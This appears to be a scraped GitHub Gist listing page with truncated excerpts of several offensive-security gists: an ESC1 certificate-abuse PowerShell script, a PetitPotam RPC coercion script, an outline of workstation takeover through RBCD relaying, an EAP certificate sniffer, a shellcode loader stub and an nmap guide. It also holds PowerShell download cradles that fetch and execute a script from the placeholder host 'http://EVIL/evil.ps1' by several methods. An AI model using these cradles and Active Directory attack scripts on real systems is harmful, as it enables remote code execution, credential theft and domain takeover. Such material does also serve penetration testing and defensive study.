Skip to content

Instantly share code, notes, and snippets.

b4cktr4ck2 / esc1.ps1
Created February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
View esc1.ps1
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
View PetitPotam.ps1
Install-Module NtObjectManager
Import-Module NtObjectManager
$Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll `
-DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll'
$EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' }
$client = Get-RpcClient -Server $EfsInterace
gladiatx0r /
Last active February 6, 2023 13:45
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

milo2012 /
Created September 27, 2018 04:17
Sniff and extract server SSL certificate of wireless access point (EAP)
$ python -h
Usage: [options]
-h, --help show this help message and exit
-i INTERFACENO Interface to sniff
$ python -i en0
View Invoke-WMItoSMB.ps1
function Invoke-SMBShellcodeLoad {
Short description
Long description
An example
HarmJ0y / DownloadCradles.ps1
Last active March 20, 2023 14:01
Download Cradles
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
amanelis /
Created February 4, 2013 07:02
A thorough guide to NMAP.

#NMAP Guide

  1. Basic scan to see what ports have a valid service running on them:

    nmap {host} nmap -v {host}

Pass the -v flag to print a little more information.